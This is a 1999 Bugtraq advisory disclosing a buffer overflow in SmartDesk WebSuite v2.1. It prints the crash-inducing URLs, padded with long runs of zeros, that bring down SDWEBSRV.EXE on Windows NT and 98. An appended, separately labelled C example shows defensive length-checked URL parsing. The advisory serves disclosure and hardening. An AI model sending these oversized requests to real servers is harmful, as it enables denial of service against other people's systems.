
From cmart@mail.staticusers.net Mon May 31 06:40:49 1999
From: cmart <cmart@mail.staticusers.net>
To: BUGTRAQ@netspace.org
Date: Tue, 25 May 1999 20:53:17 PDT
Subject: Buffer overflow in SmartDesk WebSuite v2.1

Advisory: Buffer overflow in SmartDesk WebSuite v2.1
Platforms Affected: Windows NT, Windows 98
Found by: cmart (cmart@staticusers.net)
Date: 5/23/99

Description:
-----------
WebSuite v2.1 will crash when an additional 250+ characters
are appended after the site's URL on NT Server 4 and NT
Workstation 4 boxes.

Running on top of Windows 98 it will crash with 150+ characters
appended after the site's URL.

After reinstalling on both platforms several times, the
overflow string length varied.  Approximately 1 out of 8 times
the overflow string went from 150 chars (Win98) to about
1000+ chars.  It also went from 250+ chars (NT) to about
2000+ chars.

After the server crashes on NT Workstation 4, it's unable
to find the lib file sysclass.flb (in our test).

Details:
-------
[Windows NT]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000

SDWEBSRV.EXE crashes.

[Windows 98]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000

SDWEBSRV.EXE crashes.

-----------------------------
cmart | cmart@staticusers.net
http://winntsec.com
-----------------------------
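
Added example, not part of the original advisory and not SmartDesk code: a request-line parser that checks the URL length before copying and answers 414 instead of overrunning a fixed buffer. The advisory does not show the server's source, so the function names, the 128-byte limit and the status constants are assumptions, and the test input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 128  /* assumed policy limit; the advisory gives none */
enum { REQ_OK = 200, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 };

/* Hypothetical helper: copy the request-target of "GET /path HTTP/1.0"
 * into out[out_size]. Every length is checked before the copy, so an
 * over-long URL is refused instead of overrunning or being truncated. */
int parse_target(const char *line, size_t len, char *out, size_t out_size)
{
    const char *sp, *target, *stop;
    size_t n;

    if (line == NULL || out == NULL || out_size == 0) return REQ_BAD;
    out[0] = '\0';
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n')) len--;

    sp = memchr(line, ' ', len);                 /* end of the method token */
    if (sp == NULL || sp == line) return REQ_BAD;
    target = sp + 1;
    stop = memchr(target, ' ', len - (size_t)(target - line));
    if (stop == NULL) stop = line + len;         /* no version token */
    n = (size_t)(stop - target);

    if (n == 0 || target[0] != '/') return REQ_BAD;
    if (memchr(target, '\0', n) != NULL) return REQ_BAD;   /* embedded NUL */
    if (n > MAX_TARGET || n >= out_size) return REQ_URI_TOO_LONG;

    memcpy(out, target, n);
    out[n] = '\0';
    return REQ_OK;
}

/* Constructed input: "GET /" + fill '0' characters + " HTTP/1.0\r\n". */
int status_for_fill(size_t fill)
{
    char line[4096], out[MAX_TARGET + 1];
    size_t pos = 5;

    if (fill > sizeof line - 32) return REQ_BAD;
    memcpy(line, "GET /", 5);
    memset(line + pos, '0', fill);
    pos += fill;
    memcpy(line + pos, " HTTP/1.0\r\n", 11);
    return parse_target(line, pos + 11, out, sizeof out);
}

int main(void) {
    printf("%d %d %d\n", status_for_fill(10), status_for_fill(150), status_for_fill(250));
    return 0;
}
```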
